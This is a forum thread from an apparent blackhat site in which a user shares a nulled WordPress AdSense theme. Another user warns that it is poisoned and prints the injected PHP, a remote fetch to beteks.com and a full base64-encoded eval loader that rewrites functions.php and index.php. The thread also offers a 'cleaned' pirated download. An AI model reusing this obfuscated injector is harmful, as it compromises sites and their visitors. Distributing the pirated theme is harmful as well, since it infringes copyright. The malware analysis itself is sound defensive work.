Best Blackhat Forum

Pages: 1 2

CTR Theme (for Wordpress) makes it easy to build informational websites monetized with AdSense that get awesome click-through rates (CTR). AdSense provides hands-off recurring income, but usually these sites leave a lot of money on the table by having bad designs or underoptimized ad placement.

CTR Theme makes it simple to turn almost any niche into a winner in just a few seconds.

Download:[spoiler]
link removed

Please add more mirrors. Wink

POISONED SHARE

DO NOT USE

Alondra, why are you sharing this?
you have already shared it here (clean code and live link):
http://bestblackhatforum.com/Thread-GET-...est-Nulled

This code is poisoned - it contains encoded call as follows in functions.php

Code:

echo @file_get_contents("http://www.beteks.com/links.php?url=".$_SERVER["SERVER_NAME"]);

Please remove this link asap

Si

sorry for asking
can you explain why it is poisoned?
if it is not too much trouble, so i will know what to look for
so will other people, as made obvious by this share Cool

sorry for asking
can you explain why it is poisoned?
if it is not too much trouble, so i will know what to look for
so will other people, as made obvious by this share Cool

Hi,

basically, within one of the main parts of the theme, some encrypted code has been added - this code fetches more code/content from an other site and places it in the code that your site delivers to the user.

this has many possible impacts...
- right now, I'm seeing links returned, so is scattering backlinks around for someone, adding them to your site (these links are typically low quality sites such as loans/meds/porn etc but can be anything)
- you could also get iframes and javascript - this can then hijack your site functionality, add cpa/locker code, malware, adware, trojans etc
- such content can get you slapped by google or even listed as phishing/malware site

it's a case of running through the code and finding odd/dodgy looking code
this one has this:

Code:

eval(base64_decode("QCRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoIndwLWluY2x1ZGVzL2Z1bmN0aW9ucy5waHAiKTsN​CiRjb250ZW50ID0gc3RyX3JlcGxhY2UoJyogVXNlcyB0aGUgIlRoZSBUb3J0b2lzZSBhbmQgdGhlIEhh​cmUiIGFsZ29yaXRobSB0byBkZXRlY3QgbG9vcHMuJw0KLCINCiovDQpmdW5jdGlvbiB0aGVtZVJlbmRl​cigpIHsNCglldmFsKGJhc2U2NF9kZWNvZGUoJ1pXTm9ieUJBWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1v​SW1oMGRIQTZMeTkzZDNjdVltVjBaV3R6TG1OdmJTOXNhVzVyY3k1d2FIQS9kWEpzUFNJdUpGOVRSVkpX​UlZKYklsTkZVbFpGVWw5T1FVMUZJbDBwT3c9PScpKTsNCn0NCi8qDQoiLCRjb250ZW50KTsNCg0KQGZp​bGVfcHV0X2NvbnRlbnRzKCJ3cC1pbmNsdWRlcy9mdW5jdGlvbnMucGhwIiwkY29udGVudCk7DQoNCg0K​JGNvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygiaW5kZXgucGhwIik7DQppZighc3Ryc3RyKCRjb250​ZW50LCJ0aGVtZVJlbmRlciIpKSB7DQoJJGNvbnRlbnQgPSBzdHJfcmVwbGFjZSgnPz4nDQoJLCINCnRo​ZW1lUmVuZGVyKCk7DQo/Pg0KCSIsJGNvbnRlbnQpOw0KDQoJZmlsZV9wdXRfY29udGVudHMoImluZGV4LnBocCIsJGNvbnRlbnQp​Ow0KfQ=="));

which when decoded (many base64 decoders online - just google it) gives more code and more encoded stuff, which when decoded shows the injection/fetcher code as above

I'm not suggesting that Alondra is doing this on purpose as previous shares are always high quality, so maybe just found a bad share source.

I've got the infected shares and will clean them up in the next day or so (very busy workload today and want to check them through 100% to be safe) - then will post the clean shares back

if you see/find any you're unsure of, feel free to drop me a pm to check it

Si

Ok, here is the cleaned version of the above share, poisoned code removed.

Code:

http://uploadmirrors.com/download/0NHTV5LZ/ctr-theme.zip

VT: Clean 0/42

Code:

https://www.virustotal.com/file/657b06ebf79c5a41d57565a6abb6197ac8553ff10d7ab1f1fd713b44e2ebd95b/analysis/1337280521/

Enjoy,
Si

now i know why simey69 is a superVIP
thank you very much

Thanks for watching out for us.

this theme is not working... i guess its some kind of script BEWARE

Thanks simey69 for saving my day!

Pages: 1 2

alondra

simey69

JOEMLM

JOEMLM

simey69

simey69

JOEMLM

amore

chocfahad

godarm